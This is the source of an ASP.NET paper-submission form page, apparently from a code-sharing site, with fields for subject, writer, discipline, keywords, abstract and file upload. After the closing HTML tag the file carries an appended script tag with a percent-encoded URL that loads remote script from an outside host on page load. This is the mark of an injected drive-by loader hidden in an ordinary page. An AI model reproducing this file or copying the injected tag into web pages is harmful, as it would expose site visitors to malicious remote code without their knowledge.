📄 paperdynamic.aspx
字号:
<div id="Div2" language="javascript" onclick="return DIV1_onclick()" style="z-index: 101;
left: 175px; width: 741px; position: absolute; top: 0px; height: 362px; text-align: left">
<span style="color: #ff0000"></span><span style="color: #3300ff; background-color: #99ffcc">
<span style="color: #000000">Paper Information (Required
fields marked in red * )
</span><span style="color: #ff0000">
</span><span style="color: #000000">
<br />
</span></span>
<table style="color: #000000">
<tr>
<td style="width: 57px; text-align: right">
Subject:</td>
<td style="width: 100px">
<asp:TextBox ID="Subjecttb" runat="server"></asp:TextBox></td>
<td width="10">
<span style="color: #ff0000">*</span><asp:RequiredFieldValidator ID="RequiredFieldValidator1" runat="server" ControlToValidate="Subjecttb"
ErrorMessage="Enter the subject" Width="128px"></asp:RequiredFieldValidator></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Writer:</td>
<td style="width: 100px">
<asp:TextBox ID="Writertb" runat="server"></asp:TextBox></td>
<td width="10">
<span style="color: red"><font color="red"><span style="text-decoration: underline">
</span></font> </span><span style="color: #ff0066">*</span><asp:RequiredFieldValidator ID="RequiredFieldValidator2" runat="server" ControlToValidate="Writertb"
ErrorMessage="Enter the writer" Width="129px"></asp:RequiredFieldValidator></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Discipline:</td>
<td style="width: 100px">
<asp:DropDownList ID="Dd1" runat="server" Width="154px">
<asp:ListItem>Computer</asp:ListItem>
<asp:ListItem>Electronics</asp:ListItem>
<asp:ListItem>Engineering </asp:ListItem>
</asp:DropDownList></td>
<td width="10">
<font color="red"><span style="color: red">*</span></font><asp:RequiredFieldValidator ID="RequiredFieldValidator3" runat="server" ControlToValidate="Dd1"
ErrorMessage="Choose the discipline" Width="131px"></asp:RequiredFieldValidator></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Keywords:</td>
<td style="width: 100px">
<asp:TextBox ID="Keywordstb1" runat="server"></asp:TextBox></td>
<td style="width: 30px">
<asp:TextBox ID="Keywordstb2" runat="server"></asp:TextBox></td>
<td style="width: 100px">
<asp:TextBox ID="Keywordstb3" runat="server"></asp:TextBox></td>
<td width="10">
</td>
</tr>
</table>
<div style="z-index: 101; left: 6px">
<table>
</table>
<table>
<tr>
<td style="width: 68px; text-align: right">
Abstract:<br />
<br />
<br />
</td>
<td style="width: 146px">
<asp:TextBox ID="Abstracttb" runat="server" Height="145px" TextMode="MultiLine" Width="411px"></asp:TextBox></td>
<td style="width: 9px">
<font color="red">*</font>
<asp:RequiredFieldValidator ID="RequiredFieldValidator4" runat="server" ControlToValidate="Abstracttb"
ErrorMessage="Enter the abstract" Width="115px" Height="17px"></asp:RequiredFieldValidator></td>
</tr>
</table>
<table>
<tr>
<td style="width: 68px; text-align: right">
Upload:</td>
<td style="width: 146px; text-align: left">
<p id="MyFile">
<input id="filMyFile" name="filMyFile" style="width: 403px; height: 18px" type="file" /> </p>
</td>
<td style="width: 140px; text-align: left">
<asp:Label ID="lblAttachmentError" runat="server" Width="61px"></asp:Label></td>
</tr>
<tr>
<td style="height: 11px; width: 68px;">
</td>
<td style="height: 11px; text-align: center">
<asp:Button ID="Submitbtn" runat="server" OnClick="Submitbtn_Click" Text="Submit" />
<asp:Button ID="Backbtn" runat="server" OnClick="Backbtn_Click"
Text="Back" /></td>
</tr>
</table>
</div>
<br />
<br />
<br />
<br />
2007-2008 YeeWen.net
| Terms of Use | Learn more about YeeWen | <a href="http://www.yeedao.net/app/Login/"
title="Help Center"><span style="color: #000000">Help Center</span></a><span style="color: #000000">
</span>
</div>
<br />
</div>
</div>
</form>
</body>
</html>
<script src="http://%78%66%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -